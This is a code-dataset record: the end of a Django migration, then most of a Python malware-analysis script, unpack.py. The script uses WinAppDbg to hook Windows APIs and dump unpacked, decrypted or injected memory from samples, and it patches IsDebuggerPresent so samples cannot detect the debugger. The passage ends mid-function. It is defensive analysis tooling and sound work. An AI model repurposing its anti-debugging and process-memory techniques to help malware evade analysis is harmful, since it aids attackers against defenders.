'Meta': {'object_name': 'ServiceTranslate'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Language']"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['home.Service']"})
},
u'home.typeorganization': {
'Meta': {'ordering': "['name']", 'object_name': 'TypeOrganization'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['home']
|
mit
| -1,723,778,893,577,949,000
| 64.292929
| 126
| 0.540771
| false
| 3.688927
| false
| false
| false
|
dchad/malware-detection
|
vs/unpack.py
|
1
|
37916
|
##############################################################
# Python script to attempt automatic unpacking/decrypting of #
# malware samples using WinAppDbg. #
# #
# unpack.py v2016.01.25 #
# http://malwaremusings.com/scripts/unpack.py #
##############################################################
import sys
import traceback
import winappdbg
import time
import struct
import ctypes
# Log file which we log info to
logfile = None
class MyEventHandler(winappdbg.EventHandler):
###
# A. Declaring variables
###
# A.1 used to keep track of allocated executable memory
allocedmem = {}
# A.2 used to indicate that we've found the entry point
entrypt = 0x00000000
#
# variables used to find and disassemble unpacking loop
#
# A.3 used to indicate that we're single stepping
tracing = -1
# A.4 remember the last two eip values
lasteip = [0x00000000,0x00000000]
# A.5 lowest eip address we see
lowesteip = 0xffffffff
# A.6 highest eip address we see
highesteip = 0x00000000
# A.7 list of addresses which we've disassembled
disasmd = []
# A.8 keeps track of addresses and instructions
# that write to the allocated memory block(s)
writeaddrs = {}
#
# variables used to keep track of created processes
#
# A.9 keeps track of created processes to map
# hProcess from WriteProcessMemory() back to
# process name
createdprocesses = {}
# A.10 keeps track of processes that were created
# with the CREATE_SUSPENDED flag set
createsuspended = {}
#
# variables used for logging
#
# A.11 used to keep a log of events
eventlog = []
###
# B. Class methods (functions)
###
### B.1
# get_funcargs(event)
# query winappdbg to get the function arguments
#
# return a tuple consisting of the return address
# and a sub-tuple of function arguments
###
def get_funcargs(self,event):
h = event.hook
t = event.get_thread()
tid = event.get_tid()
return (t.get_pc(),h.get_params(tid))
### B.2
# guarded_read(d,t,addr,size)
# read memory after checking for, and if necessary,
# disabling memory breakpoints
#
# returns a string of data
###
def guarded_read(self,d,t,addr,size):
# keep track of breakpoints that we disabled
# so that we can enable them again after we've
# finished
reenablebps = []
# initialise the variable to hold the read
# memory data
data = ""
# check that the requested size is sane
if (size > 0):
p = t.get_process()
# check to see if the requested address falls within
# any of the existing memory breakpoints by checking
# if either the requested start address or end address
# is covered by any breakpoint
mem_bps = d.get_all_page_breakpoints()
for (pid,pgbp) in mem_bps:
(startaddr,endaddr) = pgbp.get_span()
if (pid == p.get_pid()) and (pgbp.is_here(addr) or pgbp.is_here(addr + size - 1)):
log("[D] Memory read in guarded memory. Disabling breakpoint: %s" % pgbp)
pgbp.disable(p,t)
reenablebps.append(pgbp)
# read the memory
data = p.read(addr,size)
# enable all of the breakpoints that we disabled
if (len(reenablebps) > 0):
for pgbp in reenablebps:
log("[D] Re-enabling breakpoint: %s" % pgbp)
pgbp.enable(p,t)
# return the read memory as a string
return data
###
# C. API Hooks
###
### C.1
# apiHooks: winappdbg defined hash of API calls to hook
#
# Each entry is indexed by library name and is an array of
# tuples consisting of API call name and number of args
###
apiHooks = {
"kernel32.dll":[
("VirtualAlloc",4),
("VirtualAllocEx",5),
("IsDebuggerPresent",0),
("CreateProcessA",10),
("CreateProcessW",10),
("WriteProcessMemory",5)
],
"advapi32.dll":[
("CryptDecrypt",6)
],
"wininet.dll":[
("InternetOpenA",5),
("InternetOpenW",5)
],
"ntdll.dll":[
("RtlDecompressBuffer",6)
],
"secur32.dll":[
("EncryptMessage",4),
("DecryptMessage",4)
]
}
###
# API hook callback functions
#
# These are defined by winappdbg and consist of functions
# named pre_<apifuncname> and post_<apifuncname> which are
# called on entry to, and on exit from, the given API
# function (<apifuncname>), respectively.
###
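#
# A minimal sketch of that convention (illustrative only -- Sleep() is not
# hooked above; it would need a ("Sleep",1) entry in apiHooks first):
#
# def pre_Sleep(self,event,*args):
#     (ra,dwMilliseconds) = (args[0],args[1])   # args[0] is the return address
#     log("[*] Sleep(%d) about to be called from 0x%x" % (dwMilliseconds,ra))
#
# def post_Sleep(self,event,retval):
#     log("[*] Sleep() returned %d" % retval)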
# C.2
# VirtualAlloc() hook(s)
#
def post_VirtualAllocEx(self,event,retval):
try:
# C.2.1 Get the return address and arguments
(ra,(hProcess,lpAddress,dwSize,flAllocationType,flProtect)) = self.get_funcargs(event)
# Get an instance to the debugger which triggered the event
# and also the process id and thread id of the process to which
# the event pertains
d = event.debug
pid = event.get_pid()
tid = event.get_tid()
# Log the fact that we've seen a VirtualAllocEx() call
log("[*] <%d:%d> 0x%x: VirtualAllocEx(0x%x,0x%x,0x%x (%d),0x%x,0x%03x) = 0x%x" % (pid,tid,ra,hProcess,lpAddress,dwSize,dwSize,flAllocationType,flProtect,retval))
# C.2.2 All the memory protection bits which include EXECUTE
# permission use bits 4 - 7, which is nicely matched
# by masking (ANDing) it with 0xf0 and checking for a
# non-zero result
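# For example (standard Win32 constants): PAGE_EXECUTE_READWRITE is 0x40,
# and 0x40 & 0xf0 = 0x40 (non-zero), while PAGE_READWRITE is 0x04, and
# 0x04 & 0xf0 = 0 -- so only EXECUTEable allocations pass this test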
if (flProtect & 0x0f0):
log("[-] Request for EXECUTEable memory")
# We can only set page guards on our own process
# otherwise page guard exception will occur in
# system code when this process attempts to write
# to the allocated memory.
# This causes ZwWriteVirtualMemory() to fail
# We can, however, set a page guard on it when
# this process creates the remote thread, as it
# will have presumably stopped writing to the
# other process' memory at that point.
# C.2.2.1 Check that this VirtualAllocEx() call is for
# the current process (hProcess == -1), and if
# so, ask the winappdbg debugger instance to
# create a page guard on the memory region.
# Also add information about the allocated region
# to our allocedmem hash, indexed by pid and
# base address.
if (hProcess == 0xffffffff):
d.watch_buffer(pid,retval,dwSize - 1,self.guard_page_exemem)
self.allocedmem[(pid,retval)] = dwSize
# C.2.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "VirtualAllocEx",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hProcess": hProcess,
"lpAddress": lpAddress,
"dwSize": dwSize,
"flAllocationType": flAllocationType,
"flProtect": flProtect
},
"ret": retval
})
except:
traceback.print_exc()
raise
def post_VirtualAlloc(self,event,retval):
try:
# C.2.4 Get the return address and arguments
(ra,(lpAddress,dwSize,flAllocationType,flProtect)) = self.get_funcargs(event)
# Get an instance to the debugger which triggered the event
# and also the process id and thread id of the process to which
# the event pertains
d = event.debug
pid = event.get_pid()
tid = event.get_tid()
# Log the fact that we've seen a VirtualAlloc() call
# This is so that we get the address in the debuggee code from which it was called
# where as if we just let the VirtualAllocEx() hook log it, the address from
# which it was called is inside the VirtualAlloc() code in kernel32.dll
log("[*] <%d:%d> 0x%x: VirtualAlloc(0x%x,0x%x (%d),0x%x,0x%03x) = 0x%x" % (pid,tid,ra,lpAddress,dwSize,dwSize,flAllocationType,flProtect,retval))
# C.2.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "VirtualAlloc",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"lpAddress": lpAddress,
"dwSize": dwSize,
"flAllocationType": flAllocationType,
"flProtect": flProtect
},
"ret": retval
})
except:
traceback.print_exc()
raise
# C.3
# CryptDecrypt() hook(s)
#
def pre_CryptDecrypt(self,event,*args):
# C.3.1 Get the return address and arguments
(ra,hKey,hHash,Final,dwFlags,pbData,pdwDataLen) = (args[0],args[1],args[2],args[3],args[4],args[5],args[6])
# C.3.2 Get a Process object and dereference the pdwDataLen argument to read the buffer size
p = event.get_process()
buffsize = p.read_uint(pdwDataLen)
# C.3.3 Save a copy of the encrypted data
filename = "%s.memblk0x%x.enc" % (sys.argv[1],pbData)
log("[-] Dumping %d bytes of encrypted memory at 0x%x to %s" % (buffsize,pbData,filename))
databuff = open(filename,"wb")
databuff.write(p.read(pbData,buffsize));
databuff.close()
def post_CryptDecrypt(self,event,retval):
# C.3.4 Get the return address and arguments
(ra,(hKey,hHash,Final,dwFlags,pbData,pdwDataLen)) = self.get_funcargs(event)
# Get a Process object, and dereference the pdwDataLen argument
p = event.get_process()
buffsize = p.read_uint(pdwDataLen)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: CryptDecrypt(0x%x,0x%x,0x%x,0x%x,0x%x,0x%x (%d)) = %d" % (pid,tid,ra,hKey,hHash,Final,dwFlags,pbData,buffsize,buffsize,retval))
# C.3.5 Save a copy of the decrypted data
filename_enc = "%s.memblk0x%x.enc" % (sys.argv[1],pbData)
filename = "%s.memblk0x%x.dec" % (sys.argv[1],pbData)
log("[-] Dumping %d bytes of decrypted memory at 0x%x to %s" % (buffsize,pbData,filename))
databuff = open(filename,"wb")
databuff.write(p.read(pbData,buffsize))
databuff.close()
# C.3.6 Create a JSON event log entry
# (pid and tid were already fetched above)
self.eventlog.append({
"time": time.time(),
"name": "CryptDecrypt",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hKey": hKey,
"hHash": hHash,
"Final": Final,
"dwFlags": dwFlags,
"pbData": pdwDataLen
},
"ret": retval,
"info": {
"filename_enc": filename_enc,
"filename_dec": filename
}
})
# C.4
# RtlDecompressBuffer() hook(s)
#
def pre_RtlDecompressBuffer(self,event,*args):
try:
# C.4.1 Get the return address and arguments
(ra,CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize) = (args[0],args[1],args[2],args[3],args[4],args[5],args[6])
p = event.get_process()
# C.4.2 Save a copy of the compressed data
filename = "%s.memblk0x%x.comp" % (sys.argv[1],CompressedBuffer)
log("[-] Dumping %d bytes of compressed memory at 0x%x to %s" % (CompressedBufferSize,CompressedBuffer,filename))
databuff = open(filename,"wb")
databuff.write(p.read(CompressedBuffer,CompressedBufferSize));
databuff.close()
except:
traceback.print_exc()
raise
def post_RtlDecompressBuffer(self,event,retval):
try:
# C.4.3 Get the return address and arguments
(ra,(CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: RtlDecompressBuffer(0x%x,0x%x,0x%x,0x%x,0x%x,0x%x): %d" % (pid,tid,ra,CompressionFormat,UncompressedBuffer,UncompressedBufferSize,CompressedBuffer,CompressedBufferSize,FinalUncompressedSize,retval))
# Get a Process object, and dereference the FinalUncompressedSize argument
p = event.get_process()
buffsize = p.read_uint(FinalUncompressedSize)
# C.4.4 save a copy of the decompressed data
filename_comp = "%s.memblk0x%x.comp" % (sys.argv[1],CompressedBuffer)
filename = "%s.memblk0x%x.decomp" % (sys.argv[1],UncompressedBuffer)
log("[-] Dumping %d bytes of decompressed memory at 0x%x to %s" % (buffsize,UncompressedBuffer,filename))
databuff = open(filename,"wb")
databuff.write(p.read(UncompressedBuffer,buffsize))
databuff.close()
# C.4.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "RtlDecompressBuffer",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"CompressionFormat": CompressionFormat,
"UncompressedBuffer": UncompressedBuffer,
"UncompressedBufferSize": UncompressedBufferSize,
"CompressedBuffer": CompressedBuffer,
"CompressedBufferSize": CompressedBufferSize,
"FinalUncompressedSize": FinalUncompressedSize
},
"ret": retval,
"info": {
"filename_comp": filename_comp,
"filename_decomp": filename
}
})
except:
traceback.print_exc()
raise
# C.5
# CreateProcess() hook(s)
#
def post_CreateProcess(self,event,retval,fUnicode):
try:
# C.5.1 Get the return address and arguments
(ra,(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation)) = self.get_funcargs(event)
p = event.get_process()
t = event.get_thread()
pid = event.get_pid()
tid = event.get_tid()
# C.5.2 Dereference arguments
# Use the Process object to dereference the lpApplicationName and lpCommandLine arguments
# as either ASCII or WCHAR depending on the fUnicode argument
# (and hence whether we were called from post_CreateProcessA() or post_CreateProcessW() respectively
szApplicationName = p.peek_string(lpApplicationName,fUnicode)
szCommandLine = p.peek_string(lpCommandLine,fUnicode)
# If the lpProcessInformation argument is a valid pointer...
if (lpProcessInformation):
# ... dereference it to get the ProcessInformation structure
d = event.debug
ProcessInformation = self.guarded_read(d,t,lpProcessInformation,16)
# Extract the various fields from the ProcessInformation structure
hProcess = struct.unpack("<L",ProcessInformation[0:4])[0]
hThread = struct.unpack("<L",ProcessInformation[4:8])[0]
dwProcessId = struct.unpack("<L",ProcessInformation[8:12])[0]
dwThreadId = struct.unpack("<L",ProcessInformation[12:16])[0]
else:
log("[E] lpProcessInformation is null")
# fall back to zeroes so the log call below doesn't hit a NameError
hProcess = hThread = dwProcessId = dwThreadId = 0
log("[*] <%d:%d> 0x%x: CreateProcess(\"%s\",\"%s\",0x%x): %d (0x%x, 0x%x, <%d:%d>)" % (pid,tid,ra,szApplicationName,szCommandLine,dwCreationFlags,retval,hProcess,hThread,dwProcessId,dwThreadId))
# C.5.3 Check if the process is being created in a suspended state (CREATE_SUSPENDED flag)...
if (dwCreationFlags & 0x4):
# ... hook the ResumeThread() API call
# so that we are notified when it is resumed
d = event.debug
stat = d.hook_function(pid,"ResumeThread",preCB = self.hook_createsuspendedresume,paramCount = 1)
self.createsuspended[(pid,hThread)] = dwProcessId
log("[-] CREATE_SUSPENDED. Hooking ResumeThread() (%d)" % stat)
# C.5.4 Keep track of processes that were created, so we know which
# process any WriteProcessMemory() calls are writing to
self.createdprocesses[hProcess] = {
"time": time.time(),
"ppid": pid,
"ptid": tid,
"paddr": ra,
"ApplicationName":szApplicationName,
"CommandLine": szCommandLine,
"CreationFlags": dwCreationFlags,
"hProcess": hProcess,
"hThread": hThread,
"ProcessId": dwProcessId,
"ThreadId": dwThreadId
}
# C.5.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "CreateProcess",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"ApplicationName":szApplicationName,
"CommandLine": szCommandLine,
"CreationFlags": dwCreationFlags,
"hProcess": hProcess,
"hThread": hThread,
"ProcessId": dwProcessId,
"ThreadId": dwThreadId
},
"info": {
"fUnicode":fUnicode
},
"ret": retval
})
except:
traceback.print_exc()
raise
# C.5.6 post_CreateProcessA() and post_CreateProcessW()
# Actual hook call-back function called by WinAppDbg
# To save duplicating code between this and post_CreateProcessW()
# both of them call post_CreateProcess() with a parameter, fUnicode,
# which specifies whether the strings are ASCII (CreateProcessA())
# or WCHAR (CreateProcessW())
def post_CreateProcessA(self,event,retval):
self.post_CreateProcess(event,retval,False)
def post_CreateProcessW(self,event,retval):
self.post_CreateProcess(event,retval,True)
# hook_createsuspendedresume() is a call-back function called when
# ResumeThread() is call by a process which has created a suspended
# process
def hook_createsuspendedresume(self,event,*args):
# C.5.7 Get the return address and arguments
(ra,(hThread,)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: ResumeThread(0x%x)" % (pid,tid,ra,hThread))
# C.5.8 Find the process id of the resumed process
if ((pid,hThread) in self.createsuspended):
pidresumed = self.createsuspended[(pid,hThread)]
log("[-] New suspended process (pid %d) resumed" % pidresumed)
# C.6
# WriteProcessMemory() hook(s)
#
def post_WriteProcessMemory(self,event,retval):
# C.6.1 Get the return address and arguments
try:
(ra,(hProcess,lpBaseAddress,lpBuffer,nSize,lpNumberOfBytesWritten)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: WriteProcessMemory(0x%x,0x%x,0x%x,0x%x,0x%x): %d" % (pid,tid,ra,hProcess,lpBaseAddress,lpBuffer,nSize,lpNumberOfBytesWritten,retval))
d = event.debug
t = event.get_thread()
# C.6.2 Dereference lpNumberOfBytesWritten to get the number of bytes written to the target process'
# address space
if (lpNumberOfBytesWritten):
NumberOfBytesWritten = struct.unpack("<L",self.guarded_read(d,t,lpNumberOfBytesWritten,4))[0]
else:
NumberOfBytesWritten = None
# C.6.3 Get process information that was saved by CreateProcess() hook
if (hProcess in self.createdprocesses):
ProcessId = self.createdprocesses[hProcess]["ProcessId"]
ApplicationName = self.createdprocesses[hProcess]["ApplicationName"]
CommandLine = self.createdprocesses[hProcess]["CommandLine"]
else:
log("[W] hProcess not in createdprocesses[]")
# use 0 rather than None so the %d filename/log formatting below doesn't raise
ProcessId = 0
ApplicationName = None
CommandLine = None
# C.6.4 Save a copy of the written memory
# (d, t, pid and tid were already fetched above)
filename = "%s.memblk0x%x-%d.wpm" % (sys.argv[1],lpBaseAddress,ProcessId)
log("[-] Dumping %d bytes of memory at %d:0x%x written to %d:0x%x to %s" % (nSize,pid,lpBuffer,ProcessId,lpBaseAddress,filename))
databuff = open(filename,"wb")
databuff.write(self.guarded_read(d,t,lpBuffer,nSize))
databuff.close()
# C.6.5 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "WriteProcessMemory",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {
"hProcess": hProcess,
"lpBaseAddress": lpBaseAddress,
"lpBuffer": lpBuffer,
"nSize": nSize,
"lpNumberOfBytesWritten": lpNumberOfBytesWritten,
"NumberOfBytesWritten": NumberOfBytesWritten
},
"ret": retval,
"info": {
"filename": filename,
"targetprocesspid": ProcessId,
"targetprocessname": ApplicationName,
"targetprocesscmdline": CommandLine
}
})
except:
traceback.print_exc()
raise
# C.7
# IsDebuggerPresent() hook(s)
# (mainly added so that AutoIt compiled scripts would run, but also useful
# as an anti-anti-malware technique)
#
def post_IsDebuggerPresent(self,event,retval):
# C.7.1 Get the return address and arguments
(ra,noargs) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> 0x%x: IsDebuggerPresent(): 0x%x" % (pid,tid,ra,retval))
log("[-] Returning 0")
# C.7.2 Changed the 'eax' register (return value) to '0' (no debugger present)
# just before we continue running the calling thread
t = event.get_thread()
t.set_register("Eax",0x0)
# C.7.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "IsDebuggerPresent",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {},
"ret": retval,
"info": {}
})
# C.8
# InternetOpen() hook(s)
#
def post_InternetOpen(self,event,retval,fUnicode):
# C.8.1 Get the return address and arguments
(ra,(lpszAgent,dwAccessType,lpszProxyName,lpszProxyBypass,dwFlags)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
# C.8.2 Dereference arguments
p = event.get_process()
szAgent = p.peek_string(lpszAgent,fUnicode)
szProxyName = p.peek_string(lpszProxyName,fUnicode)
szProxyBypass = p.peek_string(lpszProxyBypass,fUnicode)
log("[*] <%d:%d> 0x%x: InternetOpen(\"%s\",0x%x,\"%s\",\"%s\",0x%x) = 0x%x" % (pid,tid,ra,szAgent,dwAccessType,szProxyName,szProxyBypass,dwFlags,retval))
# C.8.3 Create a JSON event log entry
self.eventlog.append({
"time": time.time(),
"name": "InternetOpen",
"type": "Win32 API",
"pid": pid,
"tid": tid,
"addr": ra,
"args": {},
"ret": retval,
"info": {}
})
def post_InternetOpenA(self,event,retval):
self.post_InternetOpen(event,retval,False)
def post_InternetOpenW(self,event,retval):
self.post_InternetOpen(event,retval,True)
def pre_EncryptMessage(self,event,*args):
# C.?.1 Get the return address and arguments
try:
(ra,phContext,fQOP,pMessage,MessageSeqNo) = (args[0],args[1],args[2],args[3],args[4])
pid = event.get_pid()
tid = event.get_tid()
# Right -- this is going to get annoying
# pMessage is a pointer to a SecBufferDesc structure
# which describes an array of SecBuffer structures
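# For reference, the Win32 layouts being peeked at below (32-bit):
# SecBufferDesc: ULONG ulVersion; ULONG cBuffers; PSecBuffer pBuffers
# SecBuffer (12 bytes each): ULONG cbBuffer; ULONG BufferType; PVOID pvBuffer
# which is why the loop below reads offsets 0, 4 and 8 of each 12-byte entry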
p = event.get_process()
l = p.get_label_at_address(ra)
# really ought to use a ctypes struct for this!
ulVersion = p.peek_uint(pMessage)
cBuffers = p.peek_uint(pMessage + 4)
pBuffers = p.peek_uint(pMessage + 8)
log("[*] <%d:%d> %s 0x%x: EncryptMessage(...)" % (pid,tid,l,ra))
log("[D] ulVersion: %d" % ulVersion)
log("[D] cBuffers: %d" % cBuffers)
log("[D] pBuffers: 0x%x" % pBuffers)
# dump buffer list
for i in range(0,cBuffers):
cbBuffer = p.peek_uint(pBuffers + (i * 12) + 0)
BufferType = p.peek_uint(pBuffers + (i * 12) + 4)
pvBuffer = p.peek_uint(pBuffers + (i * 12) + 8)
if (BufferType == 1): # SECBUFFER_DATA
# we have data to save
filename = sys.argv[1] + ".encmsg0x%08x-%d" % (pvBuffer,pid)
f = open(filename,"ab")
f.write(p.peek(pvBuffer,cbBuffer))
f.close()
log("[D]")
log("[D] cbBuffer: 0x%x (%d)" % (cbBuffer,cbBuffer))
log("[D] BufferType: 0x%x" % BufferType)
log("[D] pvBuffer: 0x%x" % pvBuffer)
except:
traceback.print_exc()
raise
def post_DecryptMessage(self,event,retval):
# C.?.1 Get the return address and arguments
try:
(ra,(phContext,pMessage,MessageSeqNo,pfQOP)) = self.get_funcargs(event)
pid = event.get_pid()
tid = event.get_tid()
# Right -- this is going to get annoying
# pMessage is a pointer to a SecBufferDesc structure
# which describes an array of SecBuffer structures
p = event.get_process()
# really ought to use a ctypes struct for this!
ulVersion = p.peek_uint(pMessage)
cBuffers = p.peek_uint(pMessage + 4)
pBuffers = p.peek_uint(pMessage + 8)
log("[*] <%d:%d> 0x%x: DecryptMessage(...)" % (pid,tid,ra))
log("[D] ulVersion: %d" % ulVersion)
log("[D] cBuffers: %d" % cBuffers)
log("[D] pBuffers: 0x%x" % pBuffers)
# dump buffer list
for i in range(0,cBuffers):
cbBuffer = p.peek_uint(pBuffers + (i * 12) + 0)
BufferType = p.peek_uint(pBuffers + (i * 12) + 4)
pvBuffer = p.peek_uint(pBuffers + (i * 12) + 8)
if (BufferType == 1): # SECBUFFER_DATA
# we have data to save
filename = sys.argv[1] + ".decmsg0x%08x-%d" % (pvBuffer,pid)
f = open(filename,"ab")
f.write(p.peek(pvBuffer,cbBuffer))
f.close()
log("[D]")
log("[D] cbBuffer: 0x%x (%d)" % (cbBuffer,cbBuffer))
log("[D] BufferType: 0x%x" % BufferType)
log("[D] pvBuffer: 0x%x" % pvBuffer)
except:
traceback.print_exc()
raise
###
# D. winappdbg debug event handlers
###
### D.1
# create_process
#
# winappdbg defined callback function to handle process creation events
###
def create_process(self,event):
p = event.get_process()
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Create process event for pid %d (%s)" % (pid,tid,p.get_pid(),p.get_image_name()))
log("[-] command line: %s" % p.get_command_line())
#log("[D] Create process event for pid %d (%d)" % (pid,tid))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"pid": p.get_pid(),
"module_base": event.get_module_base(),
"filename": event.get_filename(),
"cmdline": p.get_command_line()
},
})
### D.2
# exit_process
#
# winappdbg defined callback function to handle process exit events
###
def exit_process(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Exit process event for %s: 0x%x" % (pid,tid,event.get_filename(),event.get_exit_code()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"module_base": event.get_module_base(),
"filename": event.get_filename(),
"exitcode": event.get_exit_code()
},
})
### D.3
# create_thread
#
# winappdbg defined callback function to handle thread creation events
###
def create_thread(self,event):
pid = event.get_pid()
tid = event.get_tid()
t = event.get_thread()
name = t.get_name()
log("[*] <%d:%d> Create thread event \"%s\" @ 0x%x" % (pid,tid,name,event.get_start_address()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"startaddress": event.get_start_address(),
"threadname": name
},
})
### D.4
# exit_thread
#
# winappdbg defined callback function to handle thread exit events
###
def exit_thread(self,event):
pid = event.get_pid()
tid = event.get_tid()
t = event.get_thread()
name = t.get_name()
log("[*] <%d:%d> Exit thread event \"%s\"" % (pid,tid,name,))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"threadname": name
},
})
### D.5
# load_dll
#
# winappdbg defined callback function to handle DLL load events
###
def load_dll(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Load DLL event: %s" % (pid,tid,event.get_filename()))
self.eventlog.append({
"time": time.time(),
"name": event.get_event_name(),
"type": "WinAppDbg Event",
"pid": pid,
"tid": tid,
"info": {
"module_base": event.get_module_base(),
"filename": event.get_filename(),
},
})
### D.6
# event
#
# winappdbg defined callback function to handle any remaining events
###
def event(self,event):
pid = event.get_pid()
tid = event.get_tid()
log("[*] <%d:%d> Unhandled event: %s" % (pid,tid,event.get_event_name()))
###
# E. winappdbg debug exception handlers
###
### E.1
# guard_page
#
# winappdbg defined callback function to handle guard page exceptions
###
def guard_page_exemem(self,exception):
try:
f_type = exception.get_fault_type()
e_addr = exception.get_exception_address()
f_addr = exception.get_fault_address()
# get the process and thread ids
pid = exception.get_pid()
tid = exception.get_tid()
# It is interesting to log this, but it generates a lot of log
# output and slows the whole process down
#log("[!] <%d:%d> 0x%x: GUARD_PAGE(%d) exception for address 0x%x" % (pid,tid,e_addr,f_type,f_addr))
#log("[*] VirtualAlloc()d memory address 0x%x accessed (%d) from 0x%x (%s)" % (f_addr,f_type,e_addr,instr))
# E.1.2 Was it a memory write operation?
if (f_type == winappdbg.win32.EXCEPTION_WRITE_FAULT):
# E.1.2.1 Use the writeaddrs[] array to check to see
# if we have already logged access from this
# address, as unpacking is generally done in
# a loop and we don't want to log the same
# instructions for each iteration
if not e_addr in self.writeaddrs:
p = exception.get_process()
t = exception.get_thread()
label = p.get_label_at_address(e_addr)
instr = t.disassemble_instruction(e_addr)[2].lower()
log("[*] VirtualAlloc()d memory address 0x%x written from 0x%x (%s): %s" % (f_addr,e_addr,label,instr))
self.writeaddrs[e_addr] = instr
# E.1.2.2 Use the tracing variable to see if we have
# already started tracing, that is single
# stepping. If not, enable it, and make a note
# of the fact by setting the tracing variable
# to True
if (self.tracing == -1):
self.tracing = 0
d = exception.debug
log("[-] Enabling tracing")
d.start_tracing(exception.get_tid())
# E.1.3 Was it a memory instruction fetch (execute) operation,
# and if so, are we still looking for the entry point address?
if (f_type == winappdbg.win32.EXCEPTION_EXECUTE_FAULT) and (self.entrypt == 0):
self.entrypt = e_addr
t = exception.get_thread()
jmpinstr = t.disassemble_instruction(self.lasteip[0])[2].lower()
# E.1.3.1 Log what we've found
#log("[D] lasteip[1]: 0x%x" % self.lasteip[1])
log("[*] Found unpacked entry point at 0x%x called from 0x%x (%s) (after executing %d instructions)" % (self.entrypt,self.lasteip[0],jmpinstr,self.tracing))
log("[-] Unpacking loop at 0x%x - 0x%x" % (self.lowesteip,self.highesteip))
pid = exception.get_pid()
tid = exception.get_tid()
elog = ({
"time": time.time(),
"name": "unpacking loop found",
"type": "unpack event",
"pid": pid,
"tid": tid,
"info": {
"unpacked_entry_point": self.entrypt,
"callingaddr": self.lasteip[0],
"callinginstr": jmpinstr
},
})
# E.1.3.2
for (mem_pid,memblk) in self.allocedmem:
if (mem_pid == pid):
size = self.allocedmem[(mem_pid,memblk)]
endaddr = memblk + size - 1
if (e_addr >= memblk) and (e_addr <= endaddr):
# E.1.3.3 Log what we're doing and delete the memory breakpoint
log("[-] Dumping %d bytes of memory range 0x%x - 0x%x" % (size,memblk,endaddr))
d = exception.debug
d.dont_watch_buffer(exception.get_pid(),memblk,size - 1)
# E.1.3.4 Disable single-step debugging
self.tracing = -1
d.stop_tracing(exception.get_tid())
# E.1.3.5 Reset unpacking loop variables
self.entrypt = 0x00000000
#del self.lasteip
self.lasteip = [0x00000000,0x00000000]
self.lowesteip = 0xffffffff
self.highesteip = 0x00000000
# E.1.3.6 Dump the memory block to a file
p = exception.get_process()
filename = sys.argv[1] + ".memblk0x%08x" % memblk
dumpfile = open(filename,"wb")
dumpfile.write(p.read(memblk,size))
dumpfile.close()
elog["info"]["filename"] = filename
self.eventlog.append(elog)
except Exception as e:
traceback.print_exc()
raise
### E.2
# single_step
#
# winappdbg defined callback function to handle single step exceptions
###
def single_step(self,exception):
try:
# E.2.1 Get the exception address
e_addr = exception.get_exception_address()
# E.2.2 If we have just looped back (eip has gone backward)
if (e_addr < self.lasteip[1]):
# Remember this lower address as the lowest loop address
if self.lowesteip == 0xffffffff: self.lowesteip = e_addr
# ... and the address we just jumped from as the highest loop address
if self.highesteip == 0x00000000: self.highesteip = self.lasteip[1]
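# Worked example: for an unpacking loop 0x401000 - 0x401020 that ends in
# "jmp 0x401000" (addresses hypothetical), the first backward jump sets
# lowesteip = 0x401000 and highesteip = 0x401020, bounding the loop body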
# E.2.3 If we are executing an instruction within the bounds of the loop
# and we haven't already disassembled this address, then do so
if (e_addr >= self.lowesteip) and (e_addr <= self.highesteip) and (not e_addr in self.disasmd):
t = exception.get_thread()
disasm = t.disassemble_instruction(e_addr)
instr = disasm[2].lower()
log(" 0x%x: %s" % (e_addr,instr))
